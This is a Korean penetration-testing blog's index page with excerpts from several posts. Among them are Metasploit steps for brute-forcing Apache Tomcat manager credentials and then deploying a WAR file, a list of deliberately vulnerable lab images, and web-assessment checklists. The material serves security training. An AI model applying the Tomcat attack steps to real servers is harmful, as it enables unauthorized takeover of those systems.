분류 전체보기257 Apache Tomcat 관리자 페이지 취약점 악용 - Metasploit 톰캣에서 [서버주소]:[서버포트]/manager/html 로 접속하게 되면 관리자 페이지 로그인 아이디와 비밀번호 입력 알림창이 뜬다. 이 상태에서 칼리에서 msfconsole을 틀어준다. >service postgresql start >msfconsole >search tomcat >use auxiliary/scanner/http/tomcat_mgr_login - mgr, 즉 매니저 로그인 취약점을 통해 아이디 비번을 알아낸다. >show options >set rhosts [서버아이피] >set rport [서버포트] >exploit 익스플로잇 후 성공한 목록의 아이디 비밀번호로 접속한다. 그 후 WAR file to deploy 탭을 활용한 취약점 해킹을 시도한다. >back >clear >sear.. 2023. 12. 28. 모의해킹 면접 등 취업 관련 https://blog.naver.com/chogar/221064193792 모의해킹 면접을 보기전에 고민하면 좋은 질문들(2017년 업데이트) 아래는 필자가 "모의해킹"이라는 단어에 시작하여 파생된 단어들을 가지고 만든 질문들입니다. 강의자료를 ... blog.naver.com https://blog.naver.com/chogar/221786760570 2023. 12. 28. 모의해킹 환경 구축 가능한 사이트 및 소스 파일 1.Metasploitable - 리눅스 가상머신으로 메타스플로잇 모의해킹에 최적화된 이미지입니다. VMware 등에 넣어서 사용합니다. https://sourceforge.net/projects/metasploitable/ Metasploitable Download Metasploitable for free. Metasploitable is an intentionally vulnerable Linux virtual machine. This is Metasploitable2 (Linux) Metasploitable is an intentionally vulnerable Linux virtual machine. This VM can be used to conduct security training, te .. 2023. 12. 28. 모의해킹 기초 실무 노트 II - 모의해킹, 웹 서비스 진단 모의해킹 점검 방법 1)KISA 43개 항목 - KISA 홈페이지 자료실->KISA Library 2)SANS TOP 25 3)OWASP TOP 10 - Open-Source Application Security Project의 약자로써, 웹보안 표준 기구, 70여개국 국가가 등록, 10대 웹 애플리케이션 취약점이 등록됨 4)국정원 8대 취약점 5)행안부 10대 취약점 ※업체마다의 모의해킹 방법론 + 최신 취약점들[Zero day Attack] 점검 체크 리스트 1)인증 우회 - 다른 사용자 게시물 수정 및 삭제 여부 확인, 상품 결제금액 조작 여부 확인, 관리자 페이지 접근 및 우회 가능성 확인 등 - 각종 서비스에 대한 진단 항목에 따른 취약점을 점검하고 취약점 유/무를 정리 2)문서 DRM 기준 -.. 2023. 12. 28. 이전 1 ··· 11 12 13 14 15 16 17 ··· 65 다음